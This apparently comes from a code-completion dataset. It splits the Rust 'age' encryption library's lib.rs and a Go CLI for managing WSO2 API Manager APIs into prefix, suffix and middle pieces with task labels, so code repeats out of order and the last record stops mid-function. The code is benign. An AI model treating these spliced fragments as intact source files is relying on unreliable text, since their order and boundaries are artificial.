//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
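// Illustrative sketch (not part of the original crate): because `Identity` is
// object-safe, external code can compose several identities behind a single value.
// The `MultiIdentity` name is invented here purely for the example; it tries each
// inner identity in turn, mirroring the default `unwrap_stanzas` logic.
struct MultiIdentity(Vec<Box<dyn Identity>>);

impl Identity for MultiIdentity {
    fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>> {
        // The first identity that either succeeds or reports a decryption error wins.
        self.0.iter().find_map(|id| id.unwrap_stanza(stanza))
    }
}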
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
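// Illustrative sketch (not part of the original crate): a `Recipient` wrapper that
// fans the file key out to several inner recipients and concatenates their stanzas.
// The `MultiRecipient` name is invented here purely for the example.
struct MultiRecipient(Vec<Box<dyn Recipient>>);

impl Recipient for MultiRecipient {
    fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError> {
        let mut stanzas = Vec::new();
        for recipient in &self.0 {
            // Each inner recipient contributes its own stanzas for the age file header.
            stanzas.extend(recipient.wrap_file_key(file_key)?);
        }
        Ok(stanzas)
    }
}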
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provide confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
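// Illustrative sketch (not part of the original crate): a non-interactive
// `Callbacks` implementation for headless environments. The `SilentCallbacks`
// name is invented here; it surfaces messages on stderr and declines every
// prompt, so callers fall back to their "no user input available" paths.
#[derive(Clone)]
struct SilentCallbacks;

impl Callbacks for SilentCallbacks {
    fn display_message(&self, message: &str) {
        eprintln!("age: {}", message);
    }

    fn confirm(&self, _message: &str, _yes_string: &str, _no_string: Option<&str>) -> Option<bool> {
        // No UI is available, so the confirmation request cannot be shown to the user.
        None
    }

    fn request_public_string(&self, _description: &str) -> Option<String> {
        None
    }

    fn request_passphrase(&self, _description: &str) -> Option<SecretString> {
        None
    }
}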
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn fuzz_header(data: &[u8]) {
if let Ok(header) = format::Header::read(data) |
}
| {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
} | conditional_block |
lib.rs | //! *Library for encrypting and decrypting age files*
//!
//! This crate implements file encryption according to the [age-encryption.org/v1]
//! specification. It generates and consumes encrypted files that are compatible with the
//! [rage] CLI tool, as well as the reference [Go] implementation.
//!
//! The encryption and decryption APIs are provided by [`Encryptor`] and [`Decryptor`].
//! There are several ways to use these:
//! - For most cases (including programmatic usage), use [`Encryptor::with_recipients`]
//! with [`x25519::Recipient`], and [`Decryptor`] with [`x25519::Identity`].
//! - APIs are available for passphrase-based encryption and decryption. These should
//! only be used with passphrases that were provided by (or generated for) a human.
//! - For compatibility with existing SSH keys, enable the `ssh` feature flag, and use
//! [`ssh::Recipient`] and [`ssh::Identity`].
//!
//! Age-encrypted files are binary and non-malleable. To encode them as text, use the
//! wrapping readers and writers in the [`armor`] module, behind the `armor` feature flag.
//!
//! *Caution*: all crate versions prior to 1.0 are beta releases for **testing purposes
//! only**.
//!
//! [age-encryption.org/v1]: https://age-encryption.org/v1
//! [rage]: https://crates.io/crates/rage
//! [Go]: https://filippo.io/age
//!
//! # Examples
//!
//! ## Recipient-based encryption
//!
//! ```
//! use std::io::{Read, Write};
//! use std::iter;
//!
//! # fn run_main() -> Result<(), ()> {
//! let key = age::x25519::Identity::generate();
//! let pubkey = key.to_public();
//!
//! let plaintext = b"Hello world!";
//!
//! // Encrypt the plaintext to a ciphertext...
//! # fn encrypt(pubkey: age::x25519::Recipient, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_recipients(vec![Box::new(pubkey)])
//! .expect("we provided a recipient");
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the obtained ciphertext to the plaintext again.
//! # fn decrypt(key: age::x25519::Identity, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Recipients(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(iter::once(&key as &dyn age::Identity))?;
//! reader.read_to_end(&mut decrypted)?;
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # key,
//! # encrypt(pubkey, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//!
//! # run_main().unwrap();
//! ```
//!
//! ## Passphrase-based encryption
//!
//! ```
//! use age::secrecy::Secret;
//! use std::io::{Read, Write};
//!
//! # fn run_main() -> Result<(), ()> {
//! let plaintext = b"Hello world!";
//! let passphrase = "this is not a good passphrase";
//!
//! // Encrypt the plaintext to a ciphertext using the passphrase...
//! # fn encrypt(passphrase: &str, plaintext: &[u8]) -> Result<Vec<u8>, age::EncryptError> {
//! let encrypted = {
//! let encryptor = age::Encryptor::with_user_passphrase(Secret::new(passphrase.to_owned()));
//!
//! let mut encrypted = vec![];
//! let mut writer = encryptor.wrap_output(&mut encrypted)?;
//! writer.write_all(plaintext)?;
//! writer.finish()?;
//!
//! encrypted
//! };
//! # Ok(encrypted)
//! # }
//!
//! // ... and decrypt the ciphertext to the plaintext again using the same passphrase.
//! # fn decrypt(passphrase: &str, encrypted: Vec<u8>) -> Result<Vec<u8>, age::DecryptError> {
//! let decrypted = {
//! let decryptor = match age::Decryptor::new(&encrypted[..])? {
//! age::Decryptor::Passphrase(d) => d,
//! _ => unreachable!(),
//! };
//!
//! let mut decrypted = vec![];
//! let mut reader = decryptor.decrypt(&Secret::new(passphrase.to_owned()), None)?;
//! reader.read_to_end(&mut decrypted)?;
//!
//! decrypted
//! };
//! # Ok(decrypted)
//! # }
//! # let decrypted = decrypt(
//! # passphrase,
//! # encrypt(passphrase, &plaintext[..]).map_err(|_| ())?
//! # ).map_err(|_| ())?;
//!
//! assert_eq!(decrypted, plaintext);
//! # Ok(())
//! # }
//! # run_main().unwrap();
//! ```
#![cfg_attr(docsrs, feature(doc_cfg))]
#![forbid(unsafe_code)]
// Catch documentation errors caused by code changes.
#![deny(rustdoc::broken_intra_doc_links)]
#![deny(missing_docs)]
// Re-export crates that are used in our public API.
pub use age_core::secrecy;
mod error;
mod format;
mod identity;
mod keys;
mod primitives;
mod protocol;
mod util;
pub use error::{DecryptError, EncryptError};
pub use identity::{IdentityFile, IdentityFileEntry};
pub use primitives::stream;
pub use protocol::{decryptor, Decryptor, Encryptor};
#[cfg(feature = "armor")]
pub use primitives::armor;
#[cfg(feature = "cli-common")]
#[cfg_attr(docsrs, doc(cfg(feature = "cli-common")))]
pub mod cli_common;
mod i18n;
pub use i18n::localizer;
//
// Identity types
//
pub mod encrypted;
mod scrypt;
pub mod x25519;
#[cfg(feature = "plugin")]
#[cfg_attr(docsrs, doc(cfg(feature = "plugin")))]
pub mod plugin;
#[cfg(feature = "ssh")]
#[cfg_attr(docsrs, doc(cfg(feature = "ssh")))]
pub mod ssh;
use age_core::{
format::{FileKey, Stanza},
secrecy::SecretString,
};
/// A private key or other value that can unwrap an opaque file key from a recipient
/// stanza.
pub trait Identity {
/// Attempts to unwrap the given stanza with this identity.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if the recipient stanza does not match this key.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanza(&self, stanza: &Stanza) -> Option<Result<FileKey, DecryptError>>;
/// Attempts to unwrap any of the given stanzas, which are assumed to come from the
/// same age file header, and therefore contain the same file key.
///
/// This method is part of the `Identity` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// identities to [`RecipientsDecryptor::decrypt`].
///
/// Returns:
/// - `Some(Ok(file_key))` on success.
/// - `Some(Err(e))` if a decryption error occurs.
/// - `None` if none of the recipient stanzas match this identity.
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
/// [`RecipientsDecryptor::decrypt`]: protocol::decryptor::RecipientsDecryptor::decrypt
fn unwrap_stanzas(&self, stanzas: &[Stanza]) -> Option<Result<FileKey, DecryptError>> {
stanzas.iter().find_map(|stanza| self.unwrap_stanza(stanza))
}
}
/// A public key or other value that can wrap an opaque file key to a recipient stanza.
///
/// Implementations of this trait might represent more than one recipient.
pub trait Recipient {
/// Wraps the given file key, returning stanzas to be placed in an age file header.
///
/// Implementations MUST NOT return more than one stanza per "actual recipient".
///
/// This method is part of the `Recipient` trait to expose age's [one joint] for
/// external implementations. You should not need to call this directly; instead, pass
/// recipients to [`Encryptor::with_recipients`].
///
/// [one joint]: https://www.imperialviolet.org/2016/05/16/agility.html
fn wrap_file_key(&self, file_key: &FileKey) -> Result<Vec<Stanza>, EncryptError>;
}
/// Callbacks that might be triggered during encryption or decryption.
///
/// Structs that implement this trait should be given directly to the individual
/// `Recipient` or `Identity` implementations that require them.
pub trait Callbacks: Clone + Send + Sync + 'static {
/// Shows a message to the user.
///
/// This can be used to prompt the user to take some physical action, such as
/// inserting a hardware key.
fn display_message(&self, message: &str);
/// Requests that the user provide confirmation for some action.
///
/// This can be used to, for example, request that a hardware key the plugin wants to
/// try either be plugged in, or skipped.
///
/// - `message` is the request or call-to-action to be displayed to the user.
/// - `yes_string` and (optionally) `no_string` will be displayed on buttons or next
/// to selection options in the user's UI.
///
/// Returns:
/// - `Some(true)` if the user selected the option marked with `yes_string`.
/// - `Some(false)` if the user selected the option marked with `no_string` (or the
/// default negative confirmation label).
/// - `None` if the confirmation request could not be given to the user (for example,
/// if there is no UI for displaying messages).
fn confirm(&self, message: &str, yes_string: &str, no_string: Option<&str>) -> Option<bool>;
/// Requests non-private input from the user.
///
/// To request private inputs, use [`Callbacks::request_passphrase`].
fn request_public_string(&self, description: &str) -> Option<String>;
/// Requests a passphrase to decrypt a key.
fn request_passphrase(&self, description: &str) -> Option<SecretString>;
}
/// Helper for fuzzing the Header parser and serializer.
#[cfg(fuzzing)]
pub fn fuzz_header(data: &[u8]) | {
if let Ok(header) = format::Header::read(data) {
let mut buf = Vec::with_capacity(data.len());
header.write(&mut buf).expect("can write header");
assert_eq!(&buf[..], &data[..buf.len()]);
}
} | identifier_body |
|
api.go | package cli
import (
"errors"
"fmt"
"os"
"strings"
multierror "github.com/hashicorp/go-multierror"
wso2am "github.com/uphy/go-wso2am"
"github.com/urfave/cli"
)
func (c *CLI) api() cli.Command {
return cli.Command{
Name: "api",
Aliases: []string{"a"},
Usage: "API management command",
Subcommands: cli.Commands{
c.apiList(),
c.apiChangeStatus(),
c.apiDelete(),
c.apiInspect(),
c.apiSwagger(),
c.apiUpdateSwagger(),
c.apiUploadThumbnail(),
c.apiThumbnail(),
c.apiCreate(true),
c.apiCreate(false),
},
}
}
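// Illustrative sketch (not part of the original file): mounting the command tree
// above on a urfave/cli application. The binary name and the way a *CLI value is
// constructed are assumptions made for this example only.
func runExample(c *CLI) error {
	app := cli.NewApp()
	app.Name = "wso2am-cli" // hypothetical binary name
	app.Usage = "WSO2 API Manager publisher CLI"
	app.Commands = []cli.Command{c.api()}
	// Typically called from main(): os.Args carries the user's subcommand and flags.
	return app.Run(os.Args)
}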
func (c *CLI) apiList() cli.Command {
trim := func(s string, maxWidth int) string {
s = strings.Replace(s, "\r\n", "\\n", -1)
s = strings.Replace(s, "\n", "\\n", -1)
s = strings.Replace(s, "\r", "\\n", -1)
width := 0
runes := []rune(s)
result := []rune{}
for _, r := range runes {
if r < 0x80 {
width++
} else {
width += 2
}
if width > maxWidth {
break
}
result = append(result, r)
}
return string(result)
}
return cli.Command{
Name: "list",
Aliases: []string{"ls", "dir"},
Usage: "List APIs",
Flags: []cli.Flag{
cli.StringFlag{
Name: "query,q",
Value: "",
},
},
Action: func(ctx *cli.Context) error {
var query = ctx.String("query")
return list(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(query, entryc, errc, done)
}, func(table *TableFormatter) {
table.Header("ID", "Name", "Version", "Description", "Status")
}, func(entry interface{}, table *TableFormatter) {
api := c.client.ConvertToAPI(entry)
table.Row(api.ID, api.Name, api.Version, trim(api.Description, 30), api.Status)
})
},
}
}
func (c *CLI) apiChangeStatus() cli.Command {
return cli.Command{
Name: "change-status",
Usage: "Change API status",
Description: fmt.Sprintf(`Change API status.
Available actions are:
- %s
- %s
- %s
- %s
- %s
- %s
- %s
- %s
`, wso2am.APIActionPublish, wso2am.APIActionDeployAsPrototype, wso2am.APIActionDemoteToCreated, wso2am.APIActionDemoteToPrototyped, wso2am.APIActionBlock, wso2am.APIActionDeprecate, wso2am.APIActionRePublish, wso2am.APIActionRetire),
ArgsUsage: "ID ACTION",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and ACTION are required")
}
id := ctx.Args().Get(0)
action := ctx.Args().Get(1)
return c.client.ChangeAPIStatus(id, wso2am.APIAction(action))
},
}
}
func (c *CLI) apiDelete() cli.Command |
func (c *CLI) apiInspect() cli.Command {
return cli.Command{
Name: "inspect",
Aliases: []string{"show", "cat"},
Usage: "Inspect the API",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
api, err := c.client.API(id)
if err != nil {
return err
}
return c.inspect(api)
},
}
}
func (c *CLI) apiSwagger() cli.Command {
return cli.Command{
Name: "swagger",
Usage: "Inspect the API definition",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
def, err := c.client.APIDefinition(id)
if err != nil {
return err
}
return c.inspect(def)
},
}
}
func (c *CLI) apiUpdateSwagger() cli.Command {
return cli.Command{
Name: "update-swagger",
Usage: "Update the API definition",
ArgsUsage: "ID SWAGGERFILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and SWAGGERFILE are required")
}
id := ctx.Args().Get(0)
def, err := wso2am.NewAPIDefinitionFromFile(ctx.Args().Get(1))
if err != nil {
return err
}
if _, err := c.client.UpdateAPIDefinition(id, def); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiThumbnail() cli.Command {
return cli.Command{
Name: "thumbnail",
Usage: "Download the thumbnail",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
return c.client.Thumbnail(id, os.Stdout)
},
}
}
func (c *CLI) apiUploadThumbnail() cli.Command {
return cli.Command{
Name: "upload-thumbnail",
Usage: "Upload the thumbnail",
ArgsUsage: "ID FILE",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and FILE are required")
}
id := ctx.Args().Get(0)
file := ctx.Args().Get(1)
f, err := os.Open(file)
if err != nil {
return err
}
defer f.Close()
if _, err := c.client.UploadThumbnail(id, f); err != nil {
return err
}
return nil
},
}
}
func (c *CLI) apiCreate(update bool) cli.Command {
var commandName string
var commandAliases []string
var commandUsage string
var commandArgsUsage string
flags := []cli.Flag{
cli.StringFlag{
Name: "definition",
},
cli.StringFlag{
Name: "name",
},
cli.StringFlag{
Name: "context",
},
cli.StringFlag{
Name: "version",
},
cli.StringFlag{
Name: "provider",
},
cli.StringFlag{
Name: "production-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "sandbox-url",
Value: "http://localhost/",
},
cli.StringFlag{
Name: "gateway-env",
},
cli.BoolFlag{
Name: "publish,P",
},
cli.StringSliceFlag{
Name: "visible-role",
},
}
if update {
commandName = "update"
commandUsage = "Update the API"
commandArgsUsage = "ID"
} else {
commandName = "create"
commandAliases = []string{"new"}
commandUsage = "Create the API"
flags = append(flags, cli.BoolFlag{
Name: "update",
})
}
return cli.Command{
Name: commandName,
Aliases: commandAliases,
Usage: commandUsage,
ArgsUsage: commandArgsUsage,
Flags: flags,
Action: func(ctx *cli.Context) error {
if update {
if ctx.NArg() != 1 {
return errors.New("APIID is required")
}
unmodifiableFlags := []string{"name", "version", "context", "provider", "state"}
for _, f := range unmodifiableFlags {
if ctx.IsSet(f) {
return fmt.Errorf("cannot update %q", f)
}
}
} else {
if err := c.checkRequiredParameters(ctx, "definition", "name", "context", "version", "production-url", "gateway-env"); err != nil {
return err
}
}
var api *wso2am.APIDetail
if update {
id := ctx.Args().First()
a, err := c.client.API(id)
if err != nil {
return err
}
api = a
} else {
api = c.client.NewAPI()
}
if ctx.IsSet("definition") {
swaggerFile := ctx.String("definition")
def, err := wso2am.NewAPIDefinitionFromFile(swaggerFile)
if err != nil {
return err
}
api.Definition = def
}
if ctx.IsSet("name") {
api.Name = ctx.String("name")
}
if ctx.IsSet("context") {
api.Context = ctx.String("context")
}
if ctx.IsSet("version") {
api.Version = ctx.String("version")
}
if ctx.IsSet("gateway-env") {
api.GatewayEnvironments = ctx.String("gateway-env")
}
if ctx.IsSet("provider") {
api.Provider = ctx.String("provider")
}
if ctx.IsSet("visible-role") {
api.Visibility = wso2am.APIVisibilityRestricted
api.VisibleRoles = ctx.StringSlice("visible-role")
}
// endpoint config
if ctx.IsSet("production-url") || ctx.IsSet("sandbox-url") {
endpointConfig := &wso2am.APIEndpointConfig{
Type: "http",
}
var productionURL = ctx.String("production-url")
var sandboxURL = ctx.String("sandbox-url")
endpointConfig.ProductionEndpoints = &wso2am.APIEndpoint{
URL: productionURL,
}
if sandboxURL != "" {
endpointConfig.SandboxEndpoints = &wso2am.APIEndpoint{
URL: sandboxURL,
}
}
api.SetEndpointConfig(endpointConfig)
}
// if "--update" is specified with create command, find the API ID and update it.
updateOrCreate := ctx.Bool("update")
if updateOrCreate {
// find API ID by context and version
a, err := c.findAPIByContextVersion(api.Context, api.Version)
if err != nil {
return err
}
if a != nil {
api.ID = a.ID
}
}
// call API
var res *wso2am.APIDetail
var err error
if update || (updateOrCreate && api.ID != "") {
res, err = c.client.UpdateAPI(api)
} else {
res, err = c.client.CreateAPI(api)
}
if err != nil {
return err
}
// print the ID of the created API
if !update {
fmt.Println(res.ID)
}
// publish
if ctx.Bool("publish") {
return c.client.ChangeAPIStatus(res.ID, wso2am.APIActionPublish)
}
return nil
},
}
}
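// Illustrative invocation of the create/update flow above (the binary name, API
// values, and gateway environment name are hypothetical; the flag names match the
// definitions in apiCreate):
//
//	wso2am-cli api create --update --publish \
//	    --definition swagger.json --name Echo --context /echo --version v1 \
//	    --production-url http://backend:8080/ --gateway-env "Production and Sandbox"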
func (c *CLI) findAPIByContextVersion(context, version string) (*wso2am.API, error) {
result, err := c.client.SearchResultToSlice(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(fmt.Sprintf("context:%s", context), entryc, errc, done)
})
if err != nil {
return nil, err
}
normalizeContext := func(context string) string {
if strings.HasPrefix(context, "/") {
context = context[1:]
}
if strings.HasSuffix(context, "/") {
context = context[:len(context)-1]
}
return context
}
for _, v := range result {
api := c.client.ConvertToAPI(v)
if normalizeContext(api.Context) == normalizeContext(context) && api.Version == version {
return api, nil
}
}
return nil, nil
}
| {
return cli.Command{
Name: "delete",
Aliases: []string{"del", "rm"},
Usage: "Delete the API",
Flags: []cli.Flag{
cli.BoolFlag{
Name: "all,a",
},
cli.BoolFlag{
Name: "force,f",
},
},
ArgsUsage: "ID...",
Action: func(ctx *cli.Context) error {
// define rm func
var errs error
rm := func(id string) {
if err := c.client.DeleteAPI(id); err != nil {
if ctx.Bool("force") {
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionDeprecate); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionRetire); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.DeleteAPI(id); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
} else {
errs = multierror.Append(errs, err)
fmt.Println(err)
}
} else {
fmt.Println(id)
}
}
// delete apis
if ctx.Bool("all") {
var (
apic = make(chan wso2am.API)
errc = make(chan error)
done = make(chan struct{})
)
go func() {
defer func() {
close(apic)
close(errc)
close(done)
}()
c.client.SearchAPIs("", apic, errc, done)
}()
l:
for {
select {
case a, ok := <-apic:
if ok {
rm(a.ID)
} else {
break l
}
case err, ok := <-errc:
if ok {
errs = multierror.Append(errs, err)
} else {
break l
}
}
}
} else {
for _, id := range ctx.Args() {
rm(id)
}
}
return errs
},
}
} | identifier_body |
api.go | package cli
import (
"errors"
"fmt"
"os"
"strings"
multierror "github.com/hashicorp/go-multierror"
wso2am "github.com/uphy/go-wso2am"
"github.com/urfave/cli"
)
func (c *CLI) api() cli.Command {
return cli.Command{
Name: "api",
Aliases: []string{"a"},
Usage: "API management command",
Subcommands: cli.Commands{
c.apiList(),
c.apiChangeStatus(),
c.apiDelete(),
c.apiInspect(),
c.apiSwagger(),
c.apiUpdateSwagger(),
c.apiUploadThumbnail(),
c.apiThumbnail(),
c.apiCreate(true),
c.apiCreate(false),
},
}
}
func (c *CLI) apiList() cli.Command {
trim := func(s string, maxWidth int) string {
s = strings.Replace(s, "\r\n", "\\n", -1)
s = strings.Replace(s, "\n", "\\n", -1)
s = strings.Replace(s, "\r", "\\n", -1)
width := 0
runes := []rune(s)
result := []rune{}
for _, r := range runes {
if r < 0x80 {
width++
} else {
width += 2
}
if width > maxWidth {
break
}
result = append(result, r)
}
return string(result)
}
return cli.Command{
Name: "list",
Aliases: []string{"ls", "dir"},
Usage: "List APIs",
Flags: []cli.Flag{
cli.StringFlag{
Name: "query,q",
Value: "",
},
},
Action: func(ctx *cli.Context) error {
var query = ctx.String("query")
return list(func(entryc chan<- interface{}, errc chan<- error, done <-chan struct{}) {
c.client.SearchAPIsRaw(query, entryc, errc, done)
}, func(table *TableFormatter) {
table.Header("ID", "Name", "Version", "Description", "Status")
}, func(entry interface{}, table *TableFormatter) {
api := c.client.ConvertToAPI(entry)
table.Row(api.ID, api.Name, api.Version, trim(api.Description, 30), api.Status)
})
},
}
}
func (c *CLI) apiChangeStatus() cli.Command {
return cli.Command{
Name: "change-status",
Usage: "Change API status",
Description: fmt.Sprintf(`Change API status.
Available actions are:
- %s
- %s
- %s
- %s
- %s
- %s
- %s
- %s
`, wso2am.APIActionPublish, wso2am.APIActionDeployAsPrototype, wso2am.APIActionDemoteToCreated, wso2am.APIActionDemoteToPrototyped, wso2am.APIActionBlock, wso2am.APIActionDeprecate, wso2am.APIActionRePublish, wso2am.APIActionRetire),
ArgsUsage: "ID ACTION",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 2 {
return errors.New("ID and ACTION are required")
}
id := ctx.Args().Get(0)
action := ctx.Args().Get(1)
return c.client.ChangeAPIStatus(id, wso2am.APIAction(action))
},
}
}
func (c *CLI) apiDelete() cli.Command {
return cli.Command{
Name: "delete",
Aliases: []string{"del", "rm"},
Usage: "Delete the API",
Flags: []cli.Flag{
cli.BoolFlag{
Name: "all,a",
},
cli.BoolFlag{
Name: "force,f",
},
},
ArgsUsage: "ID...",
Action: func(ctx *cli.Context) error {
// define rm func
var errs error
rm := func(id string) {
if err := c.client.DeleteAPI(id); err != nil {
if ctx.Bool("force") {
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionDeprecate); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.ChangeAPIStatus(id, wso2am.APIActionRetire); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
if err := c.client.DeleteAPI(id); err != nil {
errs = multierror.Append(errs, err)
fmt.Println(err)
return
}
} else {
errs = multierror.Append(errs, err)
fmt.Println(err)
}
} else {
fmt.Println(id)
}
}
// delete apis
if ctx.Bool("all") {
var (
apic = make(chan wso2am.API)
errc = make(chan error)
done = make(chan struct{})
)
go func() {
defer func() {
close(apic)
close(errc)
close(done)
}()
c.client.SearchAPIs("", apic, errc, done)
}()
l:
for {
select {
case a, ok := <-apic:
if ok {
rm(a.ID)
} else {
break l
}
case err, ok := <-errc:
if ok {
errs = multierror.Append(errs, err)
} else {
break l
}
}
}
} else {
for _, id := range ctx.Args() {
rm(id)
}
}
return errs
},
}
}
func (c *CLI) apiInspect() cli.Command {
return cli.Command{
Name: "inspect",
Aliases: []string{"show", "cat"},
Usage: "Inspect the API",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
api, err := c.client.API(id)
if err != nil {
return err
}
return c.inspect(api)
},
}
}
func (c *CLI) apiSwagger() cli.Command {
return cli.Command{
Name: "swagger",
Usage: "Inspect the API definition",
ArgsUsage: "ID",
Action: func(ctx *cli.Context) error {
if ctx.NArg() != 1 {
return errors.New("ID is required")
}
id := ctx.Args().Get(0)
def, err := c.client.APIDefinition(id)
if err != nil {
return err
}
return c.inspect(def)
},
}
}
func (c *CLI) apiUpdateSwagger() cli.Command {
return cli.Command{
Name: "update-swagger",
Usage: "Update the API definition",
ArgsUsage: "ID SWAGGERFILE",
Action: func(ctx *cli.Context) error {
